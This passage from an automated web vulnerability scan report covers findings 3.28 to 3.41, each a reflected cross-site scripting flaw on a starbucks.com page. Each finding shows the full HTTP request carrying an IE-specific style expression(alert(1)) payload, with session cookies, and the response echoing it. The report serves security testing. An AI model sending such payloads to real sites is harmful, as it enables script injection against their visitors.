User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:15 GMT
Connection: close
Content-Length: 44497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?9ed27"style="x:expression(alert(1))"54fc7b2d713=1"/>
...[SNIP]...

3.28. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f92e"style="x:expression(alert(1))"69974f7cbb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/multi-region-blends?2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:29 GMT
Connection: close
Content-Length: 44773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?2f92e"style="x:expression(alert(1))"69974f7cbb4=1"/>
...[SNIP]...

3.29. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68bf7"style="x:expression(alert(1))"0236f70923d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:22 GMT
Connection: close
Content-Length: 41054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style="x:expression(alert(1))"0236f70923d=1"/>
...[SNIP]...

3.30. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e95fa"style%3d"x%3aexpression(alert(1))"75289b27baf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e95fa"style="x:expression(alert(1))"75289b27baf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse?e95fa"style%3d"x%3aexpression(alert(1))"75289b27baf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:39:22 GMT
Connection: close
Content-Length: 51155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse?e95fa"style="x:expression(alert(1))"75289b27baf=1"/>
...[SNIP]...

3.31. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e306b"style%3d"x%3aexpression(alert(1))"0add0d892c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e306b"style="x:expression(alert(1))"0add0d892c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/community?e306b"style%3d"x%3aexpression(alert(1))"0add0d892c7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:48:11 GMT
Connection: close
Content-Length: 41531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/community?e306b"style="x:expression(alert(1))"0add0d892c7=1"/>
...[SNIP]...

3.32. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community/mystarbucksidea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb2f"style%3d"x%3aexpression(alert(1))"d8b67fa78b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fb2f"style="x:expression(alert(1))"d8b67fa78b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/community/mystarbucksidea?6fb2f"style%3d"x%3aexpression(alert(1))"d8b67fa78b9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:51:50 GMT
Connection: close
Content-Length: 41586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/community/mystarbucksidea?6fb2f"style="x:expression(alert(1))"d8b67fa78b9=1"/>
...[SNIP]...

3.33. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c416"style%3d"x%3aexpression(alert(1))"6c5f6b29f5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c416"style="x:expression(alert(1))"6c5f6b29f5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/entertainment?1c416"style%3d"x%3aexpression(alert(1))"6c5f6b29f5d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:05 GMT
Connection: close
Content-Length: 53500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/entertainment?1c416"style="x:expression(alert(1))"6c5f6b29f5d=1"/>
...[SNIP]...

3.34. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48dbe"style%3d"x%3aexpression(alert(1))"2be3e39534b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48dbe"style="x:expression(alert(1))"2be3e39534b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps?48dbe"style%3d"x%3aexpression(alert(1))"2be3e39534b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:51 GMT
Connection: close
Content-Length: 42056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps?48dbe"style="x:expression(alert(1))"2be3e39534b=1"/>
...[SNIP]...

3.35. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/mystarbucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26134"style%3d"x%3aexpression(alert(1))"dc4b3c470d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26134"style="x:expression(alert(1))"dc4b3c470d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps/mystarbucks?26134"style%3d"x%3aexpression(alert(1))"dc4b3c470d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:43:06 GMT
Connection: close
Content-Length: 37880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks?26134"style="x:expression(alert(1))"dc4b3c470d=1"/>
...[SNIP]...

3.36. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 462d1"style%3d"x%3aexpression(alert(1))"ac69f70948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 462d1"style="x:expression(alert(1))"ac69f70948 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile?462d1"style%3d"x%3aexpression(alert(1))"ac69f70948=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:48:56 GMT
Connection: close
Content-Length: 39150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile?462d1"style="x:expression(alert(1))"ac69f70948=1"/>
...[SNIP]...

3.37. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile-bb

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de919"style%3d"x%3aexpression(alert(1))"904c963c339 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de919"style="x:expression(alert(1))"904c963c339 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile-bb?de919"style%3d"x%3aexpression(alert(1))"904c963c339=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:43:31 GMT
Connection: close
Content-Length: 39649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb?de919"style="x:expression(alert(1))"904c963c339=1"/>
...[SNIP]...

3.38. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/store-design

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b663f"style%3d"x%3aexpression(alert(1))"fd0669f60f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b663f"style="x:expression(alert(1))"fd0669f60f4 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /coffeehouse/store-design?b663f"style%3d"x%3aexpression(alert(1))"fd0669f60f4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:48:45 GMT
Connection: close
Content-Length: 44147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/store-design?b663f"style="x:expression(alert(1))"fd0669f60f4=1"/>
...[SNIP]...

3.39. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8449"style%3d"x%3aexpression(alert(1))"73d4ee3cd6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8449"style="x:expression(alert(1))"73d4ee3cd6d in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /coffeehouse/wireless-internet?a8449"style%3d"x%3aexpression(alert(1))"73d4ee3cd6d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:32 GMT
Connection: close
Content-Length: 37927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet?a8449"style="x:expression(alert(1))"73d4ee3cd6d=1"/>
...[SNIP]...

3.40. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/in-canada

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc3da"style%3d"x%3aexpression(alert(1))"1f3227134dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc3da"style="x:expression(alert(1))"1f3227134dc in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /coffeehouse/wireless-internet/in-canada?fc3da"style%3d"x%3aexpression(alert(1))"1f3227134dc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:09 GMT
Connection: close
Content-Length: 38207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/in-canada?fc3da"style="x:expression(alert(1))"1f3227134dc=1"/>
...[SNIP]...

3.41. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/starbucks-digital-network

Issue detail

